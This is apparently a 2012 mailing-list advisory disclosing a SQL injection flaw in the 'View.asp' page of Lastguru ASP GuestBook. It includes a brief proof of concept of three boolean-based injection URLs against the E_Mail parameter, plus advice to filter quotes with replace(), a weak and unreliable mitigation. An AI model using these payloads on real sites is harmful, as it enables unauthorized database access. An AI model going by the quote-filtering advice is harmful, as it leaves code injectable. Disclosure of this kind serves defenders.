[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability



Title: Lastguru ASP GuestBook 'View.asp' - SQL Injection Vulnerability

Product : Lastguru ASP GuestBook

Version : Free Version

Vendor: http://www.LastGuru.com

Class:  Input Validation Error  

CVE:
 
Remote:  Yes  

Local:  No  

Published:  2012-03-04

Updated:  

Impact : Medium (CVSSv2 Base : 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P)

Bug Description :
Page 'View.asp' of Lastguru ASP GuestBook(Free Version) is vulnerable with SQL Injection Vulnerability.

POC:
#-------------------------------------------------------------
http://victim/View.asp?E_Mail=webmaster@xxxxxxxxxxxx' and 'a'='a
http://victim/View.asp?E_Mail=webmaster@xxxxxxxxxxxx' and 'a'='b
http://victim/View.asp?E_Mail=webmaster@xxxxxxxxxxxx' and 0<(select count(*) from [book]) and 'a'='a
etc...
#-------------------------------------------------------------

Advice:
Use 'replace()' for filtering single quote and other dangerous symbols.

Credits : This vulnerability was discovered by demonalex@xxxxxxx
mail: demonalex@xxxxxxx / ChaoYi.Huang@xxxxxxxxxxxxxxxx
Pentester/Researcher
Dark2S Security Team/PolyU.HK